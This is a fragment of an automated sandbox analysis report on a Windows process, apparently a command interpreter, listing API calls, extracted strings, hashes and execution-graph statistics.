                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                          • String ID:
                                                                                          • API String ID: 1606018815-0
                                                                                          • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                          • Instruction ID: c3dded3544f514608084aaf374009de46997bbcac01cabbbcdba41e8799c34af
                                                                                          • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                          • Instruction Fuzzy Hash: 08F03035A26A43EBD7045B20E844279FAB0FB8EB13F959234EA0F42394DF3CD4088B00
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806D6
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806F0
                                                                                            • Part of subcall function 00007FF6A0E806C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E8074D
                                                                                            • Part of subcall function 00007FF6A0E806C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E80762
                                                                                            • Part of subcall function 00007FF6A0E7EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6A0E7E626,?,?,00000000,00007FF6A0E81F69), ref: 00007FF6A0E7F000
                                                                                            • Part of subcall function 00007FF6A0E7EF40: wcschr.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F031
                                                                                            • Part of subcall function 00007FF6A0E7EF40: iswdigit.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E7F0D6
                                                                                          • longjmp.MSVCRT ref: 00007FF6A0E8CCBC
                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF6A0E81F69,?,?,?,?,?,?,?,00007FF6A0E7286E,00000000,00000000,00000000,00000000), ref: 00007FF6A0E8CCE0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                          • API String ID: 3282654869-1994581435
                                                                                          • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                          • Instruction ID: a160f4b40163eca98071c2a2f40f78207f731ffcbdbfbddcb0bf0b27176f3da9
                                                                                          • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                          • Instruction Fuzzy Hash: C161E572F0B747A2FA149B21946427963A1FF497A8F544635CA1D877E2EE3CF444E300
                                                                                          APIs
                                                                                            • Part of subcall function 00007FF6A0E7CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDA6
                                                                                            • Part of subcall function 00007FF6A0E7CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6A0E7B9A1,?,?,?,?,00007FF6A0E7D81A), ref: 00007FF6A0E7CDBD
                                                                                          • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF6A0E9827A), ref: 00007FF6A0EA11DC
                                                                                          • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF6A0E9827A), ref: 00007FF6A0EA1277
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcessmemmovewcschr
                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                          • API String ID: 1135967885-381716982
                                                                                          • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                          • Instruction ID: 4704939fc40ae1e83674f7a1d186ebe4ce6bad30e8d4efd8d8cc159942be742e
                                                                                          • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                          • Instruction Fuzzy Hash: 9271D772D0A2439AEB60CF15A440779B6F4FB99799F604235CA4DD3BA0DF3CE445AB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: memmovewcsncmp
                                                                                          • String ID: 0123456789
                                                                                          • API String ID: 3879766669-2793719750
                                                                                          • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                          • Instruction ID: 7270d92c4387153d56009a2050050de24e909c692dc1978e14fc40dad23fb1d3
                                                                                          • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                          • Instruction Fuzzy Hash: 5241F732F1A78B99EA658F26D4002BA63A4FF88BC1F645131DE4E83785DF3CD5459380
                                                                                          APIs
                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E997D0
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D46E
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D485
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D4EE
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: iswspace.MSVCRT ref: 00007FF6A0E7D54D
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D569
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D58C
                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E998D7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                          • String ID: Software\Classes
                                                                                          • API String ID: 2714550308-1656466771
                                                                                          • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                          • Instruction ID: b5b8e85c48691b17884880af5c8ee277864f97eb2cfcdb4b31dc6f7fab3de6e1
                                                                                          • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                          • Instruction Fuzzy Hash: 3F41D232B0A753A2EA14DB1AD44503DA3A4FB89BD0F508135DE1E877E5EF39E856D340
                                                                                          APIs
                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9A0FC
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D46E
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6A0E7D485
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D4EE
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: iswspace.MSVCRT ref: 00007FF6A0E7D54D
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D569
                                                                                            • Part of subcall function 00007FF6A0E7D3F0: wcschr.MSVCRT ref: 00007FF6A0E7D58C
                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6A0E9A1FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                          • String ID: Software\Classes
                                                                                          • API String ID: 2714550308-1656466771
                                                                                          • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                          • Instruction ID: 8438b568964bf4fd76bd529530a98aa6c4b94132cdd34988982ff580125096dd
                                                                                          • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                          • Instruction Fuzzy Hash: AC419E32A0BB53A1EA00DB16D444439A3B4FF88BD0F548131DE5E877E5EE39D866D380
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleTitle
                                                                                          • String ID: -
                                                                                          • API String ID: 3358957663-3695764949
                                                                                          • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                          • Instruction ID: 28811b9cb8bb691c97f7fc7a87e4288b7e322d72598338b1fbe79dbe6950b655
                                                                                          • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                          • Instruction Fuzzy Hash: 2B31D432E0A743A1EA149B11A8401786AA4FF4AB90F144535DE0E97BD6DF3CE444E740
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmpswscanf
                                                                                          • String ID: :EOF
                                                                                          • API String ID: 1534968528-551370653
                                                                                          • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                          • Instruction ID: 17f1966b5c18e5d04fc44fa5d2ba4d675b04a840e272d9c5ffe31aa9919f4911
                                                                                          • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                          • Instruction Fuzzy Hash: C531B371F0E643E6FB549B15E9802B872A0FF59B50F548031EA9D963A1DF3CE885E740
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcsnicmp
                                                                                          • String ID: /-Y
                                                                                          • API String ID: 1886669725-4274875248
                                                                                          • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                          • Instruction ID: 9f4ea942a5a8c1522c88cdf46cdeb6bc50f290c48ce76316364e4210d7ed1744
                                                                                          • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                          • Instruction Fuzzy Hash: 16219076E0A75791EA659B229440278F6A0BB48FC0F549071DE89B7795DF3CE882F310
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 3$3
                                                                                          • API String ID: 0-2538865259
                                                                                          • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                          • Instruction ID: db99402bb4abab997ffae0f2246b5a97a628e6cbb8c46947602a823d9dd37cdf
                                                                                          • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                          • Instruction Fuzzy Hash: 33016972D0F283FAF3558BA0A8843747660BF86311F548236C51ED17A3DF3C6485B641
                                                                                          APIs
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806D6
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E806F0
                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E8074D
                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6A0E7B4DB), ref: 00007FF6A0E80762
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1402943771.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                          • Associated: 00000004.00000002.1402929224.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402970163.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1402986004.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                          • Associated: 00000004.00000002.1403029295.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcess
                                                                                          • String ID:
                                                                                          • API String ID: 1617791916-0
                                                                                          • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                          • Instruction ID: d8d2adda21f75f8bc6f9cc9520600fd33c715cc8777fb8e35c9c6532c3a957d0
                                                                                          • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                          • Instruction Fuzzy Hash: DD418E72A0BB43A6EA989F50E44017AB7E0FF8AB80F588036DA4E83751DF3CE544D740

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:1398
                                                                                          Total number of Limit Nodes:31
                                                                                          execution_graph: raw node/edge data of the interactive execution graph widget (function start addresses in the 7ff6a0e7xxxx to 7ff6a0e9xxxx range of the analysed process, with the API calls each node reaches, e.g. CreateMutexExW, OpenSemaphoreW, WaitForSingleObject, IsDebuggerPresent, SetUnhandledExceptionFilter, TerminateProcess, GetFullPathNameW, SetCurrentDirectoryW, SetEnvironmentVariableW); the edge list is not reproduced in text form
??_V@YAXPEAX 17301->17306 17307 7ff6a0e8408c _local_unwind 17302->17307 17308 7ff6a0e8855c ??_V@YAXPEAX 17303->17308 17310 7ff6a0e8498c 8 API calls 17304->17310 17309 7ff6a0e8855c ??_V@YAXPEAX 17305->17309 17311 7ff6a0e84056 _local_unwind 17306->17311 17307->17303 17312 7ff6a0e840a7 _local_unwind 17308->17312 17313 7ff6a0e840d2 _local_unwind 17309->17313 17314 7ff6a0e83f67 17310->17314 17311->17298 17312->17305 17315 7ff6a0e840e3 17313->17315 17314->17315 17316 7ff6a0e83f6f 17314->17316 17317 7ff6a0e8855c ??_V@YAXPEAX 17315->17317 17362 7ff6a0e8417c 17316->17362 17319 7ff6a0e840ed _local_unwind 17317->17319 17319->17276 17523 7ff6a0e84a14 GetEnvironmentStringsW 17320->17523 17323 7ff6a0e76b30 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 17325 7ff6a0e7ca40 17 API calls 17324->17325 17326 7ff6a0e9ec96 17325->17326 17327 7ff6a0e9edf7 17326->17327 17330 7ff6a0e8081c 166 API calls 17326->17330 17328 7ff6a0e9ee16 17327->17328 17329 7ff6a0e9ee0a ??_V@YAXPEAX 17327->17329 17331 7ff6a0e88f80 7 API calls 17328->17331 17329->17328 17332 7ff6a0e9ecca 17330->17332 17333 7ff6a0e94190 17331->17333 17334 7ff6a0e9ecd2 SetCurrentDirectoryW 17332->17334 17335 7ff6a0e9ecfb 17332->17335 17336 7ff6a0e9edd4 17334->17336 17337 7ff6a0e9ece9 SetErrorMode 17334->17337 17338 7ff6a0e8498c 8 API calls 17335->17338 17339 7ff6a0e8417c 166 API calls 17336->17339 17337->17335 17340 7ff6a0e9ed89 SetCurrentDirectoryW 17338->17340 17339->17327 17341 7ff6a0e9edc1 17340->17341 17342 7ff6a0e9edac GetLastError 17340->17342 17341->17336 17344 7ff6a0e9edc6 SetErrorMode 17341->17344 17343 7ff6a0e73278 166 API calls 17342->17343 17343->17341 17344->17336 17346 7ff6a0e7b914 17345->17346 17346->17346 17347 7ff6a0e7cd90 166 API calls 17346->17347 17348 7ff6a0e7b92a 17347->17348 17348->17262 17348->17267 17350 7ff6a0e829b9 17349->17350 17350->17350 17351 7ff6a0e82a1e FindFirstFileW 17350->17351 17352 7ff6a0e8e3f7 17350->17352 17354 7ff6a0e829ed 17350->17354 17356 7ff6a0e82aeb _wcsnicmp 17350->17356 17358 
7ff6a0e8e3d6 _wcsicmp 17350->17358 17359 7ff6a0e82a9d memmove 17350->17359 17360 7ff6a0e8e404 memmove 17350->17360 17351->17352 17353 7ff6a0e82a44 FindClose 17351->17353 17352->17296 17353->17350 17355 7ff6a0e88f80 7 API calls 17354->17355 17357 7ff6a0e82a02 17355->17357 17356->17350 17357->17296 17358->17350 17358->17352 17359->17350 17360->17352 17363 7ff6a0e841a8 GetCurrentDirectoryW 17362->17363 17364 7ff6a0e841d4 towupper 17362->17364 17369 7ff6a0e841b9 17363->17369 17378 7ff6a0e8081c GetEnvironmentVariableW 17364->17378 17366 7ff6a0e88f80 7 API calls 17368 7ff6a0e841c8 17366->17368 17368->17282 17369->17366 17370 7ff6a0e8ecac towupper 17372 7ff6a0e88583 17371->17372 17373 7ff6a0e88574 ??_V@YAXPEAX 17371->17373 17372->17275 17373->17372 17375 7ff6a0e7ffdb 17374->17375 17376 7ff6a0e7ff7c 17374->17376 17375->17299 17376->17375 17377 7ff6a0e7ffb5 GetProcessHeap RtlFreeHeap 17376->17377 17377->17375 17379 7ff6a0e80877 17378->17379 17380 7ff6a0e8085e 17378->17380 17381 7ff6a0e80884 _wcsicmp 17379->17381 17382 7ff6a0e80970 17379->17382 17380->17369 17380->17370 17383 7ff6a0e808a2 _wcsicmp 17381->17383 17386 7ff6a0e80989 17381->17386 17399 7ff6a0e83140 17382->17399 17385 7ff6a0e808c0 _wcsicmp 17383->17385 17383->17386 17384 7ff6a0e8417c 154 API calls 17384->17386 17385->17386 17388 7ff6a0e808de _wcsicmp 17385->17388 17386->17384 17389 7ff6a0e833f0 _vsnwprintf 17386->17389 17395 7ff6a0e89158 7 API calls 17386->17395 17425 7ff6a0e76ee4 17386->17425 17390 7ff6a0e808fc _wcsicmp 17388->17390 17391 7ff6a0e8d8d3 GetCommandLineW 17388->17391 17389->17386 17390->17386 17392 7ff6a0e8091a _wcsicmp 17390->17392 17396 7ff6a0e8d8e5 rand 17391->17396 17392->17382 17393 7ff6a0e80934 _wcsicmp 17392->17393 17393->17396 17397 7ff6a0e80952 _wcsicmp 17393->17397 17395->17386 17396->17386 17397->17382 17398 7ff6a0e8d8f9 GetNumaHighestNodeNumber 17397->17398 17398->17386 17400 7ff6a0e8e59e 17399->17400 17401 7ff6a0e83184 GetSystemTime SystemTimeToFileTime FileTimeToLocalFileTime 
